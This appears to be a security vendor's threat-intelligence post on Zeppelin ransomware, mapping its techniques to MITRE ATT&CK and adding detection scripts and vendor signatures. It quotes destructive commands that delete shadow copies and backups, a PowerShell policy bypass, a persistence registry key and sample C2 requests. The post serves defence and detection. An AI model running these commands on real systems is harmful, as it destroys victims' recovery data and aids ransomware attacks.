On August 12, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Zeppelin ransomware [1]. The Zeppelin ransomware group operates under the Ransomware-as-a-Service business model. Threat actors using Zeppelin ransomware target various industries, including defense, education, manufacturing, IT, and healthcare.
Picus Threat Library already had attack simulations for earlier variants of Zeppelin ransomware. Picus Labs added attack simulations for newer variants to Picus Threat Library, and you can test your security controls against Zeppelin ransomware attacks with Picus.
The Zeppelin ransomware group, also known as Vega or VegaLocker, started its operation in early 2019 with malvertisements (malicious advertisements) targeting Russian-speaking users. In its later ransomware campaigns, Zeppelin started to avoid hosts based in Russia and other ex-USSR countries.
Zeppelin developed various ransomware variants such as Vega, Jamper, Storm, and Buran and distributed them using the Ransomware-as-a-Service business model. Although the variants were based on the same code and had similar features, each variant was still distinguishable from the others. The latest variant, Zeppelin, is highly configurable and can be deployed in different forms: as an executable, as a DLL, or wrapped in a PowerShell loader. In addition to malvertisements, threat actors use watering hole techniques and post their malicious samples on popular sites like Pastebin.
Zeppelin ransomware uses the "double extortion" method: it exfiltrates its victims' sensitive data and threatens to leak it to pressure victims into paying the ransom.
Figure 1: Ransom note after Zeppelin infection [2]
The Zeppelin ransomware group uses the following tactics, techniques, and procedures (TTPs), mapped to the MITRE ATT&CK framework:
T1133 External Remote Services
Zeppelin threat actors abuse Remote Desktop Protocol (RDP) to infiltrate their target's network.
T1190 Exploit Public Facing Application
Zeppelin threat actors are known to exploit vulnerabilities in SonicWall products to gain initial access. Defenders are advised to patch their SonicWall products without delay.
T1566 Phishing
The Zeppelin group crafts phishing emails and fake advertisements carrying malicious links and attachments. These phishing materials aim to trick target users into executing malicious payloads and infecting their networks.
T1059 Command and Scripting Interpreter
Zeppelin ransomware uses Windows Command Prompt (cmd.exe) to execute its malicious commands. A batch file named "temp001.bat" also deletes volume shadow copies and backups and disables recovery options to inhibit system recovery.
bcdedit.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe | bcdedit /set {default} recoveryenabled no
wbadmin.exe | wbadmin delete catalog -quiet
wbadmin.exe | wbadmin delete systemstatebackup
wbadmin.exe | wbadmin delete systemstatebackup -keepversions:0
wbadmin.exe | wbadmin delete backup
wmic.exe | wmic shadowcopy delete
vssadmin.exe | vssadmin delete shadows /all /quiet
Example 1: Commands executed by "temp001.bat" file
T1059.001 PowerShell
Zeppelin ransomware uses PowerShell to bypass the execution policy and delete volume shadow copies with the following command.
powershell.exe -ExecutionPolicy ByPass -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
Example 2: Bypassing execution policy via PowerShell
T1547.001 Registry Run Keys / Startup Folder
Zeppelin ransomware establishes persistence by adding its malicious binary to the registry Run key below. This causes the ransomware to be executed each time a user logs in to the infected host. The UAC prompt option of the registry entry is also set so that the binary runs with elevated privileges.
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Example 3: Registry key used by Zeppelin to establish persistence
T1027 Obfuscated Files or Information
Strings in Zeppelin binaries are encrypted with a 32-byte RC4 key. Zeppelin also uses a Delphi packer to pack its malicious files. Both measures make detecting and analyzing the files harder for defenders.
T1070.004 File Deletion
After a successful attack, Zeppelin ransomware deletes its artifacts to avoid further detection and investigation.
T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion
Zeppelin ransomware uses the sleep function to identify whether the infected host is a virtual machine: it calls sleep and compares timestamps taken before and after the call. If the elapsed time does not match the requested sleep interval (a sign that the sleep was accelerated by an analysis environment), it does not execute its malicious functions.
T1012 Query Registry
Zeppelin ransomware reads the following registry keys to gather information about the infected host.
Viewing the installation date of the operating system | HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION (value: INSTALLDATE)
Viewing the computer name | HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME
Viewing supported languages | HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE
Viewing supported languages | HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE
Viewing Windows Trust Settings | HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING
Viewing the cryptographic machine GUID of the infected system | HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY (value: MACHINEGUID)
Example 4: Registries queried by Zeppelin ransomware
T1071.001 Web Protocols
Zeppelin ransomware communicates with its command and control (C2) server through shortened URLs that point to the C2 server.
GET /1DLTt7.gz HTTP/1.1
Host: iplogger.org
User-Agent: Zeppelin
Referer: 24D-A86-273

GET /14xAa7.tar HTTP/1.1
Host: iplogger.org
User-Agent: Imposter
Referer: 106-9DB-11F
Example 5: Sample GET requests sent by infected machines
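The two requests above share observable features a defender can hunt for in proxy logs: the hardcoded User-Agent strings, the URL-shortener host, and a Referer that carries a three-group victim ID instead of a URL. The script below is an added example, not code from the original post; the tab-separated log format, the IP addresses, and the scoring threshold are assumptions, and the Referer pattern is generalized from the two samples on the page.

```python
import re
from collections import namedtuple

# Constructed proxy log format (tab separated); not any vendor's real format.
# Fields: timestamp, source IP, method, host, path, user agent, referer.
ProxyEvent = namedtuple("ProxyEvent", "ts src method host path ua referer")

# Constructed sample log lines. The first two reproduce the requests on the
# page; the last two are benign browsing, one of them to the same shortener.
SAMPLE_LOG = """\
2022-08-12T10:01:05Z\t10.0.0.15\tGET\tiplogger.org\t/1DLTt7.gz\tZeppelin\t24D-A86-273
2022-08-12T10:01:09Z\t10.0.0.15\tGET\tiplogger.org\t/14xAa7.tar\tImposter\t106-9DB-11F
2022-08-12T10:02:00Z\t10.0.0.22\tGET\twww.example.com\t/index.html\tMozilla/5.0 (Windows NT 10.0)\thttps://www.example.com/
2022-08-12T10:02:30Z\t10.0.0.31\tGET\tiplogger.org\t/abc123\tMozilla/5.0 (Windows NT 10.0)\thttps://forum.example.net/
"""

# User-Agent values seen in the page's samples (compared case-insensitively).
KNOWN_UAS = {"zeppelin", "imposter"}
# Referer shaped like a victim ID (three hex groups) rather than a URL.
VICTIM_ID = re.compile(r"^[0-9A-F]{3}-[0-9A-F]{3}-[0-9A-F]{3}$", re.IGNORECASE)
SHORTENER_HOSTS = {"iplogger.org"}


def parse_log(text):
    """Split the constructed log into ProxyEvent records, skipping blank lines."""
    return [ProxyEvent(*line.split("\t")) for line in text.splitlines() if line.strip()]


def score(ev):
    """Return (score, reasons) for one request; each matching signal adds one."""
    reasons = []
    if ev.ua.lower() in KNOWN_UAS:
        reasons.append("hardcoded user-agent")
    if VICTIM_ID.match(ev.referer):
        reasons.append("victim-id style referer")
    if ev.host.lower() in SHORTENER_HOSTS:
        reasons.append("url shortener host")
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return [(src, path, reasons)] for requests scoring at or above threshold.
    A lone shortener visit with a browser UA scores 1 and is not reported."""
    hits = []
    for ev in events:
        s, reasons = score(ev)
        if s >= threshold:
            hits.append((ev.src, ev.path, reasons))
    return hits


if __name__ == "__main__":
    for src, path, reasons in detect(parse_log(SAMPLE_LOG)):
        print(f"{src} {path}: {', '.join(reasons)}")
```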
T1486 Data Encrypted for Impact
Zeppelin ransomware encrypts its victims' files and directories and demands a ransom for the decryption key. Some variants of Zeppelin ransomware do not keep track of hosts they have already infected, so they may encrypt files multiple times.
T1490 Inhibit System Recovery
Zeppelin ransomware deletes volume shadow copies and system state backups to prevent its victims from recovering encrypted files.
wmic shadowcopy delete
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures
wbadmin delete backup
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
vssadmin delete shadows /all /quiet
Example 6: Commands used by Zeppelin for T1490 Inhibit System Recovery
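The commands in Examples 1, 2 and 6 are the same small set of recovery-inhibiting operations, issued in a burst from one parent process. The detection script below is an added example, not code from the original post or from Picus; it matches process-creation command lines against patterns derived from those examples and groups hits by parent PID. The Sysmon-style event records are constructed for illustration, and the field names are assumptions.

```python
import re
from collections import defaultdict

# Patterns for the recovery-inhibiting commands quoted on this page
# (temp001.bat, the PowerShell one-liner and the T1490 list).
# Windows command lines are case-insensitive, so matching is too.
RULES = {
    "vssadmin_delete_shadows": r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b",
    "wmic_shadowcopy_delete": r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b",
    "bcdedit_recovery_off": r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+"
                            r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b",
    "wbadmin_delete_backups": r"\bwbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup|backup)\b",
    "powershell_wmi_shadowcopy": r"win32_shadowcopy\b.*\.delete\(\)",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def match_rules(cmdline):
    """Return the names of every rule the command line triggers (in RULES order)."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]


def scan(events):
    """Group rule hits by parent PID so a temp001.bat-style burst shows as one
    parent with several distinct rules. Returns {ppid: sorted rule names}."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["cmd"]):
            hits[ev["ppid"]].add(name)
    return {ppid: sorted(rules) for ppid, rules in hits.items()}


# Constructed process-creation events in the shape of Sysmon Event ID 1
# (pid, parent pid, command line); not taken from a real host.
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 4000, "cmd": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 4102, "ppid": 4000, "cmd": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 4103, "ppid": 4000, "cmd": "wbadmin delete catalog -quiet"},
    {"pid": 4104, "ppid": 4000, "cmd": "wmic shadowcopy delete"},
    {"pid": 4105, "ppid": 4000, "cmd": "vssadmin delete shadows /all /quiet"},
    {"pid": 5201, "ppid": 5200, "cmd": 'powershell.exe -ExecutionPolicy ByPass -Command '
                                       '"Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"'},
    {"pid": 6301, "ppid": 6300, "cmd": "vssadmin list shadows"},  # benign admin query
    {"pid": 6302, "ppid": 6300, "cmd": "wbadmin get versions"},   # benign backup listing
]

if __name__ == "__main__":
    for ppid, rules in scan(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {rules}")
```

A parent with two or more distinct rules within seconds is the high-confidence case; a single vssadmin or wbadmin hit still deserves review, since legitimate backup software rarely deletes all shadow copies.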
We also strongly suggest simulating Zeppelin ransomware attacks to test the effectiveness of your security controls against ransomware attacks using Picus' Complete Security Control Validation Platform. You can test your defenses against Zeppelin ransomware and hundreds of other ransomware families, such as Conti, DarkSide, and REvil (Sodinokibi), within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Zeppelin ransomware:
Threat ID | Action Name | Attack Module
21938 | Zeppelin Ransomware Email Threat | Email Infiltration (Phishing)
90105 | Zeppelin Ransomware Download Threat | Network Infiltration
Moreover, as of today, Picus Threat Library contains 150+ threats comprising 1500+ web application and vulnerability exploitation attacks, in addition to 3500+ endpoint, malware, email, and data exfiltration threats.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures that address Zeppelin ransomware and other ransomware attacks in preventive security controls. Picus Labs has validated the following signatures for Zeppelin:
Security Control | Signature ID | Signature Name
Check Point NGFW | 0D6B91FA4 | HEUR:Trojan-Ransom.Win32.Generic.TC.fumc
Check Point NGFW | 0DA87F6CE | HEUR:Trojan-Ransom.Win32.Generic.TC.fukl
Check Point NGFW | 0B991B00C | HEUR:Trojan.Win32.Agent.gen.TC.ampqe
Check Point NGFW | 0A8D49747 | HEUR:Trojan.Win32.DelShad.gen.TC.ako
Check Point NGFW | 0F501405D | HEUR:Trojan-Ransom.Win32.Generic.TC.fuka
Check Point NGFW | 08C45EEAF | HEUR:Trojan.Win32.Agent.gen.TC.ampqk
Check Point NGFW | 0F26AE42B | Trojan-Ransom.Win32.Vega.df.TC.c
Fortigate AV | 8156376 | W32/Buran.H!tr.ransom
Fortigate AV | 8187637 | W32/AI.Pallas.Suspicious
McAfee | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus' Complete Security Control Validation Platform.
References
[1] "#StopRansomware: Zeppelin Ransomware." [Online]. Available: https://www.cisa.gov/uscert/ncas/alerts/aa22-223a. [Accessed: Aug. 12, 2022]
[2] L. Abrams, "Zeppelin Ransomware Targets Healthcare and IT Companies," BleepingComputer, Dec. 11, 2019. [Online]. Available: https://www.bleepingcomputer.com/news/security/zeppelin-ransomware-targets-healthcare-and-it-companies/. [Accessed: Aug. 12, 2022]